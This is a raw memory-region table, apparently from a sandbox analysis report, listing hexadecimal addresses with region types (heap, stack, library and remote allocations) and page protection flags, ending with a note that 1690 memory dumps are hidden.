trusted library allocation
page read and write
29AAA132000
trusted library allocation
page read and write
212AD0EE000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
1DE807E9000
heap
page read and write
29AAE298000
trusted library allocation
page read and write
29AACDF9000
trusted library allocation
page read and write
29AAE478000
trusted library allocation
page read and write
29AAD265000
trusted library allocation
page read and write
29AAF02E000
trusted library allocation
page read and write
29AAECB5000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
29AAEE05000
trusted library allocation
page read and write
243FE5A3000
heap
page read and write
29AAE218000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
29AA8240000
heap
page read and write
4F03000
heap
page read and write
29AAE1C8000
trusted library allocation
page read and write
29AAEE66000
trusted library allocation
page read and write
29AAEF56000
trusted library allocation
page read and write
2125F5F7000
trusted library allocation
page read and write
29AACC3B000
trusted library allocation
page read and write
A30000
trusted library allocation
page read and write
79087B6000
stack
page read and write
29AAE2D8000
trusted library allocation
page read and write
29AAE898000
trusted library allocation
page read and write
243FE60E000
heap
page read and write
4E02000
trusted library allocation
page read and write
212C4E59000
heap
page read and write
1DE80550000
heap
page read and write
29AADD86000
trusted library allocation
page read and write
2639000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
1F552599000
heap
page read and write
29AAE508000
trusted library allocation
page read and write
29AAEFFE000
trusted library allocation
page read and write
1F552531000
heap
page read and write
29AACC0C000
trusted library allocation
page read and write
243FE5A9000
heap
page read and write
29AAE718000
trusted library allocation
page read and write
29AAEB6E000
trusted library allocation
page read and write
790873E000
stack
page read and write
212AAD3D000
heap
page read and write
AFE000
heap
page read and write
2ECE9FE000
stack
page read and write
1F5506B0000
heap
page read and write
29AACE38000
trusted library allocation
page read and write
29AAD198000
trusted library allocation
page read and write
1F55076B000
heap
page read and write
243FC99C000
heap
page read and write
649C000
stack
page read and write
29AADA26000
trusted library allocation
page read and write
1F55255E000
heap
page read and write
1F550759000
heap
page read and write
9E0000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
212ACCFF000
trusted library allocation
page read and write
243FC990000
heap
page read and write
243FC980000
remote allocation
page read and write
29AACA4F000
trusted library allocation
page read and write
29AAE4F8000
trusted library allocation
page read and write
29AAEF06000
trusted library allocation
page read and write
29AAEA71000
trusted library allocation
page read and write
29AAD696000
trusted library allocation
page read and write
7FF848EC6000
trusted library allocation
page read and write
1DE82450000
heap
page read and write
29AAEFE6000
trusted library allocation
page read and write
1DE824C9000
heap
page read and write
1F5525D1000
heap
page read and write
1DE82456000
heap
page read and write
1F5525AF000
heap
page read and write
29AAD356000
trusted library allocation
page read and write
2125EFD0000
heap
page read and write
1F552575000
heap
page read and write
29AAEFF6000
trusted library allocation
page read and write
29AAEB5E000
trusted library allocation
page read and write
1DE82650000
heap
page read and write
29AAF166000
trusted library allocation
page read and write
29AACA8E000
trusted library allocation
page read and write
243FE76A000
heap
page read and write
29AACEEC000
trusted library allocation
page read and write
29AACA5F000
trusted library allocation
page read and write
29AAD596000
trusted library allocation
page read and write
243FC7A7000
heap
page read and write
29AAD4A6000
trusted library allocation
page read and write
46B37FF000
stack
page read and write
29AADB16000
trusted library allocation
page read and write
29ABA39F000
trusted library allocation
page read and write
1F5524F0000
heap
page read and write
29AAEAA9000
trusted library allocation
page read and write
29AACE18000
trusted library allocation
page read and write
29AAE628000
trusted library allocation
page read and write
7908ABE000
stack
page read and write
243FC777000
heap
page read and write
29AACBAC000
trusted library allocation
page read and write
2125D360000
heap
page read and write
29AAEE16000
trusted library allocation
page read and write
1F552503000
heap
page read and write
29AAF09E000
trusted library allocation
page read and write
29AAE438000
trusted library allocation
page read and write
29AAEBE5000
trusted library allocation
page read and write
1DE82451000
heap
page read and write
29AAF15E000
trusted library allocation
page read and write
29AAD836000
trusted library allocation
page read and write
1DE826F4000
heap
page read and write
29AAF086000
trusted library allocation
page read and write
1F55076B000
heap
page read and write
29AAEE86000
trusted library allocation
page read and write
29AA82E5000
heap
page read and write
A9D000
trusted library allocation
page execute and read and write
29AAD271000
trusted library allocation
page read and write
29AA82AA000
heap
page read and write
1DE805D1000
heap
page read and write
29AAE618000
trusted library allocation
page read and write
29AADD16000
trusted library allocation
page read and write
29AACF1C000
trusted library allocation
page read and write
29AAD716000
trusted library allocation
page read and write
1DE82477000
heap
page read and write
29AAD9F6000
trusted library allocation
page read and write
29AAF3F6000
trusted library allocation
page read and write
1DE8264E000
heap
page read and write
1F5506CB000
heap
page read and write
79085FE000
stack
page read and write
7FF849110000
trusted library allocation
page read and write
29AADFF8000
trusted library allocation
page read and write
29AAEFCE000
trusted library allocation
page read and write
29AACEDC000
trusted library allocation
page read and write
243FE54C000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
212AD28D000
trusted library allocation
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
29AACD1F000
trusted library allocation
page read and write
212ACDFB000
trusted library allocation
page read and write
29ABA0B1000
trusted library allocation
page read and write
243FE870000
heap
page read and write
29AAF455000
trusted library allocation
page read and write
212AAE2C000
heap
page read and write
29AAE5C8000
trusted library allocation
page read and write
243FE536000
heap
page read and write
A33000
trusted library allocation
page execute and read and write
2E0E000
trusted library allocation
page read and write
212AAD86000
heap
page read and write
29AAEE9E000
trusted library allocation
page read and write
29AADC96000
trusted library allocation
page read and write
1DE8245F000
heap
page read and write
29AAF416000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page execute and read and write
243FC79B000
heap
page read and write
29AAD636000
trusted library allocation
page read and write
29AAD316000
trusted library allocation
page read and write
1DE82470000
heap
page read and write
46B3AFB000
stack
page read and write
7FF848FF0000
trusted library allocation
page read and write
1DE807ED000
heap
page read and write
79088BD000
stack
page read and write
29AAED9E000
trusted library allocation
page read and write
212AAD58000
heap
page read and write
243FC751000
heap
page read and write
1F550733000
heap
page read and write
243FE730000
heap
page read and write
29AAEF8E000
trusted library allocation
page read and write
29AAE4A8000
trusted library allocation
page read and write
212BCCE1000
trusted library allocation
page read and write
29AAEC9D000
trusted library allocation
page read and write
629E000
stack
page read and write
1DE82522000
heap
page read and write
29AAEB3F000
trusted library allocation
page read and write
1DE82470000
heap
page read and write
29AAD986000
trusted library allocation
page read and write
29AAF03E000
trusted library allocation
page read and write
29AAE108000
trusted library allocation
page read and write
243FC980000
remote allocation
page read and write
29AAD376000
trusted library allocation
page read and write
46B39FC000
stack
page read and write
29AAEAD0000
trusted library allocation
page read and write
29AADB86000
trusted library allocation
page read and write
29AADC16000
trusted library allocation
page read and write
1F552561000
heap
page read and write
29AAF3DA000
trusted library allocation
page read and write
1DE807E8000
heap
page read and write
BFD7EFF000
stack
page read and write
29AAD7F6000
trusted library allocation
page read and write
243FC795000
heap
page read and write
1DE8249C000
heap
page read and write
29AAF442000
trusted library allocation
page read and write
29AAF0C6000
trusted library allocation
page read and write
29AADF48000
trusted library allocation
page read and write
29AAF25C000
trusted library allocation
page read and write
29AAD178000
trusted library allocation
page read and write
2125F4D7000
heap
page execute and read and write
7FF849120000
trusted library allocation
page read and write
29AAEFD6000
trusted library allocation
page read and write
29AAF066000
trusted library allocation
page read and write
212AB000000
trusted library allocation
page read and write
29AAD906000
trusted library allocation
page read and write
46B3DFF000
stack
page read and write
29AAD064000
trusted library allocation
page read and write
212AD0A8000
trusted library allocation
page read and write
2125D570000
trusted library allocation
page read and write
1DE82465000
heap
page read and write
29AAEB96000
trusted library allocation
page read and write
29AAEDF6000
trusted library allocation
page read and write
29AACF2C000
trusted library allocation
page read and write
29AAED56000
trusted library allocation
page read and write
29AAF016000
trusted library allocation
page read and write
1DE805EC000
heap
page read and write
29AADE57000
trusted library allocation
page read and write
29AACCAB000
trusted library allocation
page read and write
29AAC9CF000
trusted library allocation
page read and write
1F5524F0000
heap
page read and write
243FE60E000
heap
page read and write
29AADE77000
trusted library allocation
page read and write
29AAD035000
trusted library allocation
page read and write
243FC78F000
heap
page read and write
2125F37D000
heap
page read and write
243FE82C000
heap
page read and write
29AAD9C6000
trusted library allocation
page read and write
29AACFE6000
trusted library allocation
page read and write
29AAE2C8000
trusted library allocation
page read and write
29AAEEF5000
trusted library allocation
page read and write
29AAF1B6000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
29AAD134000
trusted library allocation
page read and write
29AACD99000
trusted library allocation
page read and write
29AACDC9000
trusted library allocation
page read and write
2BD0000
trusted library allocation
page read and write
29AAEAA1000
trusted library allocation
page read and write
2ECEE3B000
stack
page read and write
29AAD9D6000
trusted library allocation
page read and write
29AAE698000
trusted library allocation
page read and write
243FE5A3000
heap
page read and write
29AAD295000
trusted library allocation
page read and write
29ABADAD000
trusted library allocation
page read and write
29AAEE1D000
trusted library allocation
page read and write
46B31B6000
stack
page read and write
29AAE308000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
1F5524D0000
heap
page read and write
29AAD416000
trusted library allocation
page read and write
2126F500000
trusted library allocation
page read and write
29AACEF7000
trusted library allocation
page read and write
29AAD926000
trusted library allocation
page read and write
29AAEDED000
trusted library allocation
page read and write
29AAD124000
trusted library allocation
page read and write
29AAEE96000
trusted library allocation
page read and write
1DE82501000
heap
page read and write
29AAF0EE000
trusted library allocation
page read and write
29AADBD6000
trusted library allocation
page read and write
212C4E0D000
heap
page read and write
243FC71B000
heap
page read and write
29AAED15000
trusted library allocation
page read and write
1F55250F000
heap
page read and write
29AAF1AE000
trusted library allocation
page read and write
3F2B1FE000
stack
page read and write
29AAD074000
trusted library allocation
page read and write
29AAD014000
trusted library allocation
page read and write
29AAD1D4000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
1DE824D6000
heap
page read and write
29AADF68000
trusted library allocation
page read and write
29AAE7E7000
trusted library allocation
page read and write
29AACCFA000
trusted library allocation
page read and write
6002000
heap
page read and write
29AACB6D000
trusted library allocation
page read and write
29AAEDD5000
trusted library allocation
page read and write
29ABA124000
trusted library allocation
page read and write
243FE517000
heap
page read and write
29AADF18000
trusted library allocation
page read and write
243FC7E0000
heap
page read and write
790950E000
stack
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
212C4FD7000
heap
page execute and read and write
29AAD244000
trusted library allocation
page read and write
1DE82010000
heap
page read and write
29AAE188000
trusted library allocation
page read and write
29AADFAC000
trusted library allocation
page read and write
29AAC960000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
29AADAF6000
trusted library allocation
page read and write
29AACC9B000
trusted library allocation
page read and write
AB2000
trusted library allocation
page read and write
7DF4E48B0000
trusted library allocation
page execute and read and write
29AAEB47000
trusted library allocation
page read and write
29AAD566000
trusted library allocation
page read and write
66E0000
heap
page read and write
1DE80520000
heap
page read and write
7FF848F92000
trusted library allocation
page read and write
29AADB66000
trusted library allocation
page read and write
29AAD956000
trusted library allocation
page read and write
29AAEF46000
trusted library allocation
page read and write
29AAD996000
trusted library allocation
page read and write
54DE000
stack
page read and write
243FE882000
heap
page read and write
29AACEFC000
trusted library allocation
page read and write
29AAD426000
trusted library allocation
page read and write
1DE80555000
heap
page read and write
243FC726000
heap
page read and write
29AAC1D7000
trusted library allocation
page read and write
243FE52A000
heap
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
29AAF422000
trusted library allocation
page read and write
29AAD024000
trusted library allocation
page read and write
29AAECEE000
trusted library allocation
page read and write
29AA8210000
heap
page read and write
29AAE0A8000
trusted library allocation
page read and write
29AAF26B000
trusted library allocation
page read and write
29AAD104000
trusted library allocation
page read and write
BFD7BAE000
stack
page read and write
29AACC8B000
trusted library allocation
page read and write
1F552508000
heap
page read and write
246E000
stack
page read and write
29AAE638000
trusted library allocation
page read and write
29AADDD6000
trusted library allocation
page read and write
212AAE40000
heap
page read and write
1DE805EE000
heap
page read and write
29AAD2C5000
trusted library allocation
page read and write
3F2B4FE000
stack
page read and write
29AAD496000
trusted library allocation
page read and write
29AAE993000
trusted library allocation
page read and write
29AAEE6E000
trusted library allocation
page read and write
29AACE08000
trusted library allocation
page read and write
2630000
trusted library allocation
page read and write
29AAF0A6000
trusted library allocation
page read and write
212AD3FD000
trusted library allocation
page read and write
29AADFB8000
trusted library allocation
page read and write
29AA82A2000
heap
page read and write
400000
remote allocation
page execute and read and write
29AAE4C8000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
243FE57D000
heap
page read and write
212AD24E000
trusted library allocation
page read and write
1F5524F4000
heap
page read and write
243FC78F000
heap
page read and write
212C4E8A000
heap
page read and write
2125D694000
heap
page read and write
1F552556000
heap
page read and write
243FE51A000
heap
page read and write
29AACD79000
trusted library allocation
page read and write
29AAE6E8000
trusted library allocation
page read and write
29AAEE5E000
trusted library allocation
page read and write
29AAF3D2000
trusted library allocation
page read and write
4DFB000
trusted library allocation
page read and write
29AAE6B8000
trusted library allocation
page read and write
1F552572000
heap
page read and write
29AAEE36000
trusted library allocation
page read and write
29AA9B20000
heap
page read and write
2ECEABF000
stack
page read and write
29AAE258000
trusted library allocation
page read and write
243FE5A3000
heap
page read and write
1DE82477000
heap
page read and write
29AAE498000
trusted library allocation
page read and write
212AAD60000
heap
page read and write
2125D300000
heap
page read and write
29AAE318000
trusted library allocation
page read and write
29AAD936000
trusted library allocation
page read and write
29AAF3B6000
trusted library allocation
page read and write
29AAF3C2000
trusted library allocation
page read and write
29AAD214000
trusted library allocation
page read and write
258E000
stack
page read and write
243FE763000
heap
page read and write
29AADCF6000
trusted library allocation
page read and write
29AAD8D6000
trusted library allocation
page read and write
29AAD0C4000
trusted library allocation
page read and write
29AADC46000
trusted library allocation
page read and write
21277643000
heap
page read and write
29AAE518000
trusted library allocation
page read and write
29AAF18E000
trusted library allocation
page read and write
29AAE5F8000
trusted library allocation
page read and write
29AA9BF6000
heap
page read and write
29AADFCC000
trusted library allocation
page read and write
29AAD336000
trusted library allocation
page read and write
29AAD896000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
29AAED1D000
trusted library allocation
page read and write
212C50E4000
heap
page read and write
29AACCCB000
trusted library allocation
page read and write
1DE82470000
heap
page read and write
243FE7F8000
heap
page read and write
BFD7BEE000
stack
page read and write
212ACD4C000
trusted library allocation
page read and write
29AADCD6000
trusted library allocation
page read and write
29AAD084000
trusted library allocation
page read and write
29AAD7B6000
trusted library allocation
page read and write
A3D000
trusted library allocation
page execute and read and write
29AAF40A000
trusted library allocation
page read and write
1DE82454000
heap
page read and write
29AACF66000
trusted library allocation
page read and write
29AAEEA6000
trusted library allocation
page read and write
29AAE3F8000
trusted library allocation
page read and write
29AACE28000
trusted library allocation
page read and write
1F5524D1000
heap
page read and write
29AADBF6000
trusted library allocation
page read and write
29AAC403000
trusted library allocation
page read and write
212ACD7B000
trusted library allocation
page read and write
29AAE817000
trusted library allocation
page read and write
243FE762000
heap
page read and write
1F55075F000
heap
page read and write
7FF848FC1000
trusted library allocation
page read and write
29AAF3B2000
trusted library allocation
page read and write
29AAE238000
trusted library allocation
page read and write
29AAF1D6000
trusted library allocation
page read and write
1DE82477000
heap
page read and write
29AAE648000
trusted library allocation
page read and write
243FE71D000
heap
page read and write
29AAD144000
trusted library allocation
page read and write
2125F3AE000
heap
page read and write
29AAD9B6000
trusted library allocation
page read and write
29AAEB2F000
trusted library allocation
page read and write
29AAEA5A000
trusted library allocation
page read and write
29AACF86000
trusted library allocation
page read and write
29AAF136000
trusted library allocation
page read and write
38F9000
trusted library allocation
page read and write
66DC000
stack
page read and write
1DE82477000
heap
page read and write
1DE805F9000
heap
page read and write
1DE805E9000
heap
page read and write
29AAE06F000
trusted library allocation
page read and write
29AAF7A2000
trusted library allocation
page read and write
29AAE888000
trusted library allocation
page read and write
5009000
stack
page read and write
46B35FE000
stack
page read and write
1DE8253F000
heap
page read and write
243FC7E0000
heap
page read and write
243FC7DE000
heap
page read and write
29AADB36000
trusted library allocation
page read and write
29AADEF8000
trusted library allocation
page read and write
1DE8053B000
heap
page read and write
212AD153000
trusted library allocation
page read and write
29AA9BA0000
trusted library allocation
page read and write
29AAD5F6000
trusted library allocation
page read and write
29AAE827000
trusted library allocation
page read and write
29AAE038000
trusted library allocation
page read and write
29AAC9EF000
trusted library allocation
page read and write
7FF848E12000
trusted library allocation
page read and write
29AAE678000
trusted library allocation
page read and write
2ECE97E000
stack
page read and write
29AADD26000
trusted library allocation
page read and write
243FE867000
heap
page read and write
1DE824C6000
heap
page read and write
29AAED75000
trusted library allocation
page read and write
BFD82FC000
stack
page read and write
29AAE3D8000
trusted library allocation
page read and write
29AACE68000
trusted library allocation
page read and write
1DE82506000
heap
page read and write
243FE3FF000
heap
page read and write
29AAD456000
trusted library allocation
page read and write
29AAD5A6000
trusted library allocation
page read and write
5DBE000
stack
page read and write
29AACEC7000
trusted library allocation
page read and write
1F552546000
heap
page read and write
29AAEF16000
trusted library allocation
page read and write
29AAF42A000
trusted library allocation
page read and write
29AAEBF5000
trusted library allocation
page read and write
29AAEA89000
trusted library allocation
page read and write
29AADAE6000
trusted library allocation
page read and write
29AAD8B6000
trusted library allocation
page read and write
29AAEA42000
trusted library allocation
page read and write
2ECEA3E000
stack
page read and write
29AAEA99000
trusted library allocation
page read and write
29AACBFC000
trusted library allocation
page read and write
29AAECAD000
trusted library allocation
page read and write
4E1D000
trusted library allocation
page read and write
2125F3C0000
heap
page read and write
1F55257E000
heap
page read and write
B90000
heap
page read and write
2620000
trusted library allocation
page read and write
29AADB06000
trusted library allocation
page read and write
243FE86E000
heap
page read and write
937000
stack
page read and write
29AAD766000
trusted library allocation
page read and write
1DE82651000
heap
page read and write
29AAE558000
trusted library allocation
page read and write
29AACA9E000
trusted library allocation
page read and write
29AAF176000
trusted library allocation
page read and write
2125D2F0000
heap
page read and write
2125F4F1000
trusted library allocation
page read and write
29AADFA8000
trusted library allocation
page read and write
1F552520000
heap
page read and write
212ACCE1000
trusted library allocation
page read and write
29AAE688000
trusted library allocation
page read and write
66F0000
trusted library allocation
page execute and read and write
243FE864000
heap
page read and write
29AAF0BE000
trusted library allocation
page read and write
212AB056000
heap
page read and write
29AAEF2E000
trusted library allocation
page read and write
29AAED6E000
trusted library allocation
page read and write
46B3BFF000
stack
page read and write
29AACF76000
trusted library allocation
page read and write
29AAF252000
trusted library allocation
page read and write
29AAF106000
trusted library allocation
page read and write
29AACDB9000
trusted library allocation
page read and write
29AAD164000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
29AAE088000
trusted library allocation
page read and write
BFD84FE000
stack
page read and write
29AACAAE000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
29AAD7A6000
trusted library allocation
page read and write
29AAD8F6000
trusted library allocation
page read and write
29AADD96000
trusted library allocation
page read and write
243FC73C000
heap
page read and write
5560000
trusted library allocation
page read and write
29AAF432000
trusted library allocation
page read and write
29AAEF76000
trusted library allocation
page read and write
29AAD346000
trusted library allocation
page read and write
1DE824DE000
heap
page read and write
790857E000
stack
page read and write
A27000
heap
page read and write
29AAF126000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
1DE82494000
heap
page read and write
2125F9EE000
trusted library allocation
page read and write
29AAD556000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
1F5526D0000
heap
page read and write
1DE82014000
heap
page read and write
243FE60E000
heap
page read and write
29AAEA52000
trusted library allocation
page read and write
790893E000
stack
page read and write
29AAE738000
trusted library allocation
page read and write
2125F4E0000
heap
page execute and read and write
8A7EFE000
stack
page read and write
29AADDB6000
trusted library allocation
page read and write
1F550742000
heap
page read and write
29AACAFD000
trusted library allocation
page read and write
29AAEC85000
trusted library allocation
page read and write
1DE82551000
heap
page read and write
29AAD946000
trusted library allocation
page read and write
29AACF36000
trusted library allocation
page read and write
2125D3BB000
heap
page read and write
29AADC06000
trusted library allocation
page read and write
29AAD3C6000
trusted library allocation
page read and write
29AAEC6D000
trusted library allocation
page read and write
212AB040000
heap
page read and write
29AAD576000
trusted library allocation
page read and write
29AAD406000
trusted library allocation
page read and write
29AACFB6000
trusted library allocation
page read and write
29AAD816000
trusted library allocation
page read and write
252C000
stack
page read and write
29AAE778000
trusted library allocation
page read and write
29AAA0B1000
trusted library allocation
page read and write
29AAD686000
trusted library allocation
page read and write
3F2B0FE000
stack
page read and write
1F55085E000
heap
page read and write
9C0000
heap
page read and write
29AAF406000
trusted library allocation
page read and write
29AAEF4E000
trusted library allocation
page read and write
29AAECF6000
trusted library allocation
page read and write
2660000
heap
page read and write
29AAEA2A000
trusted library allocation
page read and write
4E16000
trusted library allocation
page read and write
1DE82534000
heap
page read and write
212ACE48000
trusted library allocation
page read and write
29AAEF7E000
trusted library allocation
page read and write
29AAE914000
trusted library allocation
page read and write
29AAEE26000
trusted library allocation
page read and write
1F55075B000
heap
page read and write
29AAD506000
trusted library allocation
page read and write
29AADE16000
trusted library allocation
page read and write
BFD81F7000
stack
page read and write
1F55256A000
heap
page read and write
29AAF3C6000
trusted library allocation
page read and write
A8E000
stack
page read and write
212AB0B5000
heap
page read and write
2ECE67E000
stack
page read and write
243FE510000
heap
page read and write
29AADBE6000
trusted library allocation
page read and write
29AAD396000
trusted library allocation
page read and write
1DE82516000
heap
page read and write
29AADE06000
trusted library allocation
page read and write
29AACB9C000
trusted library allocation
page read and write
29AADFE8000
trusted library allocation
page read and write
29AACB0D000
trusted library allocation
page read and write
2ECECBE000
stack
page read and write
29AADF8C000
trusted library allocation
page read and write
29AACBEC000
trusted library allocation
page read and write
29AADBA6000
trusted library allocation
page read and write
29AAEEE6000
trusted library allocation
page read and write
1F5524F7000
heap
page read and write
29AAE7D8000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
29AAD5B6000
trusted library allocation
page read and write
243FC6F0000
heap
page read and write
1DE8247C000
heap
page read and write
29AAEB00000
trusted library allocation
page read and write
4E0E000
trusted library allocation
page read and write
29AAEAB9000
trusted library allocation
page read and write
29AAECCD000
trusted library allocation
page read and write
1DE8245F000
heap
page read and write
243FC5F0000
heap
page read and write
1DE8264D000
heap
page read and write
1F550760000
heap
page read and write
29AADA96000
trusted library allocation
page read and write
212AAFC0000
trusted library allocation
page read and write
2ECE3EE000
stack
page read and write
29AADC26000
trusted library allocation
page read and write
243FE863000
heap
page read and write
29AAD7C6000
trusted library allocation
page read and write
29AACC21000
trusted library allocation
page read and write
29AACF56000
trusted library allocation
page read and write
1DE805EB000
heap
page read and write
1DE82488000
heap
page read and write
1DE80540000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
29AAEEBE000
trusted library allocation
page read and write
29AACC6B000
trusted library allocation
page read and write
29AAF13E000
trusted library allocation
page read and write
29AAE768000
trusted library allocation
page read and write
46B34FE000
stack
page read and write
29AAE228000
trusted library allocation
page read and write
212AD0C8000
trusted library allocation
page read and write
212AAD9A000
heap
page read and write
29AAD676000
trusted library allocation
page read and write
515D000
stack
page read and write
1F5506CD000
heap
page read and write
29AAEAF0000
trusted library allocation
page read and write
29AAD5D6000
trusted library allocation
page read and write
29AAED0D000
trusted library allocation
page read and write
29AAECBD000
trusted library allocation
page read and write
29AACC41000
trusted library allocation
page read and write
29AAF1EE000
trusted library allocation
page read and write
29AAC1D4000
trusted library allocation
page read and write
4E40000
trusted library allocation
page read and write
29AACD69000
trusted library allocation
page read and write
29AAE4B8000
trusted library allocation
page read and write
29AAEA32000
trusted library allocation
page read and write
29AAD656000
trusted library allocation
page read and write
29AAE6A8000
trusted library allocation
page read and write
2125F974000
trusted library allocation
page read and write
1F5524DF000
heap
page read and write
29AAEB86000
trusted library allocation
page read and write
A93000
trusted library allocation
page read and write
29AAE868000
trusted library allocation
page read and write
29AACA0F000
trusted library allocation
page read and write
1F5506AB000
heap
page read and write
2125F510000
trusted library allocation
page read and write
212AB0B0000
heap
page read and write
29AAC9A0000
trusted library allocation
page read and write
243FC777000
heap
page read and write
243FE762000
heap
page read and write
29AAF52C000
trusted library allocation
page read and write
243FC79B000
heap
page read and write
29AAEC95000
trusted library allocation
page read and write
212ACD30000
trusted library allocation
page read and write
65DC000
stack
page read and write
29AADC56000
trusted library allocation
page read and write
29AAE398000
trusted library allocation
page read and write
212AD132000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
1DE805CD000
heap
page read and write
29AAE3B8000
trusted library allocation
page read and write
29AADA86000
trusted library allocation
page read and write
243FE863000
heap
page read and write
29AAD1E4000
trusted library allocation
page read and write
243FE3F5000
heap
page read and write
29AAF3EA000
trusted library allocation
page read and write
3F2B3FE000
stack
page read and write
1DE805F9000
heap
page read and write
29AAE4D8000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
29AAE0F8000
trusted library allocation
page read and write
29AAC9FF000
trusted library allocation
page read and write
1F5524D7000
heap
page read and write
29AAED4E000
trusted library allocation
page read and write
29AAED66000
trusted library allocation
page read and write
29AADCB6000
trusted library allocation
page read and write
29AAE98A000
trusted library allocation
page read and write
212C4DF0000
heap
page read and write
243FE863000
heap
page read and write
1F5524EB000
heap
page read and write
29AAD436000
trusted library allocation
page read and write
1DE805C2000
heap
page read and write
29AAECC5000
trusted library allocation
page read and write
243FC79B000
heap
page read and write
29AACC1C000
trusted library allocation
page read and write
ACB000
heap
page read and write
243FC756000
heap
page read and write
2125F490000
heap
page execute and read and write
1F5524E5000
heap
page read and write
29AACA7E000
trusted library allocation
page read and write
29AA9BF0000
heap
page read and write
BFD7E7E000
stack
page read and write
There are 1690 hidden memdumps, click here to show them.